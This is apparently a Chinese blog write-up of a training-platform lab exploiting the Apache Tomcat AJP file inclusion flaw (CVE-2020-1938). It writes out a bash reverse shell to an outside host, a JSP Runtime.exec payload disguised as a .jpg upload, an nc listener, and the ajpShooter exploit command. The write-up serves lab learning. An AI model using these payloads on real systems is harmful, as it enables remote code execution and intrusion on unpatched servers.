安鸾渗透实战平台（中间件） Apache Tomcat AJP 文件包含漏洞（CVE-2020-1938 ） (150分)

最新推荐文章于 2024-05-10 21:36:12 发布

阿文、...

最新推荐文章于 2024-05-10 21:36:12 发布

阅读量772

点赞数 1

分类专栏：安鸾渗透实战平台文章标签：中间件 apache tomcat

本文链接：https://blog.csdn.net/weixin_50985113/article/details/128934994

版权

安鸾渗透实战平台专栏收录该内容

24 篇文章 12 订阅

订阅专栏

漏洞环境

安鸾渗透实战平台
公网vps
CVE-2020-1938文件包含exp
base64加密网站

题目：

在这里插入图片描述

解法:

1、访问对应网页

网页上可以发现一个明显的上传点，而题目是文件包含漏洞，所以可以编写一个代码代码文件上传，然后使用文件包含就行。由于文件包含不限制后缀，这里直接上传.jsp后缀即可
在这里插入图片描述

2、制作一个反弹shell文件

写一个反弹shell然后拿去base64加密

bash -i >& /dev/tcp/1.1.1.1/666  0>&1

在这里插入图片描述
将加密后的内容做拼接，方便java解析

<%Runtime.getRuntime().exec("bash -c {echo,bash64加密后的内容}|{base64,-d}|{bash,-i}");%>

保存为jpg
在这里插入图片描述

3、来到上传点进行上传

在这里插入图片描述
上传后系统会把你的文件重命名，为了防止搞混，可以先点击查看所有图片去蹲点

文件上传成功，点击查看图片

找到你上传的图片
鼠标右键点击复制图片连接

5、起一台公网vps使用nc监听反弹shell的端口

nc -lnp 666
在这里插入图片描述

6、使用脚本进行文件包含

python ajpShooter.py http://106.15.50.112:18080/whalwl 18009 /upload/2023-000002-000008.jpg eval

http://106.15.50.112:18080/whalwl：页面位置
18009 ：ajp端口号
/upload/2023-000002-000008.jpg ：上传反弹shell图片的位置
eval ：执行

当回显200状态码时，证明成功包含并执行文件
在这里插入图片描述

7、来到vps上检查效果

使用 find / -name flag 来查找flag

在这里插入图片描述
可以看到在根目录上，直接看

cat /flag

在这里插入图片描述

漏洞描述

  该漏洞使攻击者可以读取任何webapps文件（例如webapp配置文件，源代码等）或包括一个文件来远程执行代码。由于Tomcat默认开启的AJP服务（8009端口）存在一处文件包含缺陷，攻击者可构造恶意的请求包进行文件包含操作，进而读取受影响Tomcat服务器上的Web目录文件。

影响版本

Apache Tomcat 6
Apache Tomcat 7 < 7.0.100
Apache Tomcat 8 < 8.5.51
Apache Tomcat 9 < 9.0.31